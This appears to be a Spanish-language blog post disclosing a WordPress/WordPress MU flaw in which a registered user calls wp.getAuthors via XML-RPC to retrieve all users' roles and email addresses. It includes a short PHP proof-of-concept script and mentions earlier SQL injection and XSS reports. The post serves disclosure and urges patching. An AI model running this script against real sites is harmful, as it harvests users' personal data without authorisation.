email – Buayacorp

Muchas veces he querido habilitar la suscripción de usuarios en este blog por diferentes motivos: problemas con el spam, evitar que se muestre publicidad a lectores habituales, etc; pero todas esas veces tuve que desistir porque de un modo u otro he ido descubriendo que esta opción puede "costarme caro" si es que algún usuario malintencionado tiene algo en contra mía. 😀

Entre los problemas que recuerdo haber reportado y que requerían del registro de usuarios activado tenemos los siguientes:

Inyección de SQL en WordPress 2.2 a través del método wp.suggestCategories
Usuarios sin privilegios de administrador podían realizar ciertas acciones como activación/desactivación de plugins, cambiar la apariencia del sitio, etc.
Problemas de seguridad variados: XSS, inyección de SQL, etc.

Volviendo al tema central, este problema de seguridad del que había comentado meses atrás en el blog de David, permite que un usuario registrado obtenga la lista completa de usuarios, roles y correos electrónicos del blog o sitio afectado. El proceso para recuperar esta lista es bastante sencilla y sólo basta invocar al método wp.getAuthors a través de la interface XMLRPC:

php:

<?php
include'./class-IXR.php';
$client = new IXR_Client('http://dominio.com/xmlrpc.php');

$client->query('wp.getAuthors', 1, 'alex', '1234');
$response = $client->getResponse();
print_r($response);

?>

Luego de reportar este problema leve en wordpress.com (y por consiguiente cualquier otro sitio basado en WordPress MU), ya existe un ticket con parche incluido que pone fin a esta situación y es recomendable que actualicen aquellos sitios que tengan la suscripción de usuarios habilitada.